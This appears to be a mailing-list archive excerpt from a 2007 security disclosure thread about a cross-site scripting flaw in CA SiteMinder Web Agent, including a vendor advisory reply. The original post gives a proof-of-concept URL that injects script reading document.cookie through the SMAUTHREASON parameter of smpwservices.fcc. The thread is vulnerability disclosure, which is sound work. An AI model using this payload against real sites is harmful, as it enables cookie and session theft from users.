Re: Re: SiteMinder Agent: Cross Site Scripting

2007-11-09 Thread overet
I don't know the details of vulnerable version but smpwservices.fcc page was accessed directly in the tested version. Exploit code was triggered like this: [*] with the URL: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X I can view this javascript code in

Re: SiteMinder Agent: Cross Site Scripting

2007-11-09 Thread Williams, James K
Subject: SiteMinder Agent: Cross Site Scripting From: Giuseppe Gottardi overet () securitydate ! it Date: 2007-11-07 3:10:00 Security Advisory for CA Products utilizing CA SiteMinder Web Agent Last Updated: November 8, 2007 CA is aware of a report describing a cross-site scripting

SiteMinder Agent: Cross Site Scripting

2007-11-07 Thread Giuseppe Gottardi
# Exploit in [XSS]: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] # Cross Site Scripting (Code): https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 In this way we can inject the alert()